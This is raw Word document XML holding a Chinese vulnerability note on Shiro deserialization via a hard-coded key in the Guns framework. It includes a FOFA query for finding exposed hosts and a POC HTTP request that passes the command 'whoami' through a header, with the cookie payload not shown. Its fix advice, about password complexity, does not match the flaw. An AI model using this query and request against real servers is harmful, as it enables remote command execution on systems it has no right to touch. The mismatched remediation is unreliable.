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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Guns快速开发平台 Shiro反序列化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漏洞描述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Guns是一个现代化的 Java 应用开发框架，基于主流技术Spring Boot 2 + ，Guns的核心理念是提高开发人员开发效率，降低企业信息化系统的开发成本。 Guns v5.1 及之前的版本存在 shiro 反序列化漏洞，该漏洞源于软件存在硬编码的 shiro-key，攻击者可利用该 key 生成恶意的序列化数据，在服务器上执行任意代码，执行系统命令、或打入内存马等，获取服务器权限。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漏洞复现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FOFA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app="Guns"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2108835"/>
            <wp:effectExtent l="0" t="0" r="127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0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界面如下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6690" cy="2583815"/>
            <wp:effectExtent l="0" t="0" r="635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POC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 / HTTP/1.1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Host: your-ip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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15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Cookie: rememberMe=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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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X-Token-Data: whoami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Accept-Encoding: gzip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865" cy="1498600"/>
            <wp:effectExtent l="0" t="0" r="317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修复建议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1、强制用户更改口令符合密码复杂度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A8D952"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F5A8D95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FjMjk2ZGFmYzhiMGZlNDU2YjkyZTI5ZjVlNDdkMWIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="088766C0"/>
    <w:rsid w:val="09365567"/>
    <w:rsid w:val="09684FD8"/>
    <w:rsid w:val="0B8E420A"/>
    <w:rsid w:val="0F9F7790"/>
    <w:rsid w:val="16247C45"/>
    <w:rsid w:val="16A064FF"/>
    <w:rsid w:val="1A862C7C"/>
    <w:rsid w:val="1D951428"/>
    <w:rsid w:val="1E6E300D"/>
    <w:rsid w:val="212D1351"/>
    <w:rsid w:val="25145328"/>
    <w:rsid w:val="2B7803BF"/>
    <w:rsid w:val="43CE2E1A"/>
    <w:rsid w:val="4813210A"/>
    <w:rsid w:val="48952158"/>
    <w:rsid w:val="4B3A317F"/>
    <w:rsid w:val="4EA62829"/>
    <w:rsid w:val="501C6CBB"/>
    <w:rsid w:val="51B95737"/>
    <w:rsid w:val="5294532B"/>
    <w:rsid w:val="56010E2D"/>
    <w:rsid w:val="570F757A"/>
    <w:rsid w:val="58B640E9"/>
    <w:rsid w:val="5F13397F"/>
    <w:rsid w:val="631F28F3"/>
    <w:rsid w:val="69877444"/>
    <w:rsid w:val="7074398C"/>
    <w:rsid w:val="70DB63F3"/>
    <w:rsid w:val="72447BF5"/>
    <w:rsid w:val="72CB65F3"/>
    <w:rsid w:val="7765702E"/>
    <w:rsid w:val="79892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rPr>
      <w:sz w:val="24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2023-12-10T07:30:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-11T16:11:22Z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DCB59B1095054FCF9E23DDA822A003FF_12</vt:lpwstr>
  </property>
</Properties>
</file>